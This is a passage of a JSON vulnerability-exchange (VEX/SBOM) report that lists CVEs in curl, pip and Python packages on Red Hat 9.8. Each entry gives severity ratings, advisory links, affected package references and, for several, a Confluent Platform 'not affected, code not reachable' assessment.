          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8286",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A vulnerability exists where a new transfer that uses STARTTLS to upgrade the\nconnection might reuse an existing live connection even though the TLS\nconfiguration mismatches so it should not.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8286"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8286.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-32xh-3x3c-6g6h"
        },
        {
          "url": "https://hackerone.com/reports/3718195"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8286.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8286"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8286"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T19:42:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8643",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22
      ],
      "description": "pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.",
      "recommendation": "Upgrade pip to version 26.1.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8643"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/01/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34456"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34740"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34741"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34748"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34749"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34750"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34752"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34756"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34758"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34765"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34772"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34773"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34774"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34775"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34776"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34777"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34778"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34780"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34891"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36193"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36315"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50479"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8643"
        },
        {
          "url": "https://bugzilla.redhat.com/2460927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8643"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-36315.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36193"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2026-196.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14000"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8643.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-36315.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8643.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
        }
      ],
      "published": "2026-06-01T17:17:35+00:00",
      "updated": "2026-08-19T12:18:40+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/pip@26.0.1"
        }
      ]
    },
    {
      "id": "CVE-2026-8924",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw in curl\u2019s cookie parsing logic allows a malicious HTTP server to set\n'super cookies' that bypass the Public Suffix List check. This enables an\nattacker-controlled origin to inject cookies that curl subsequently scopes and\ntransmits to unrelated third-party domains.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8924"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8924"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8924.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hm6c-rc5h-32m9"
        },
        {
          "url": "https://hackerone.com/reports/3733905"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8924"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8924"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:06:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8925",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "The curl logic that works with SASL authentication could end up cleaning up\nthe GSASL context *twice* without clearing the pointer in between, making it\n`free()` the same pointer twice.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8925"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8925"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8925.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8925.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8925.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-p8x5-c6c9-8cwx"
        },
        {
          "url": "https://hackerone.com/reports/3735193"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8925"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8925"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:04:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
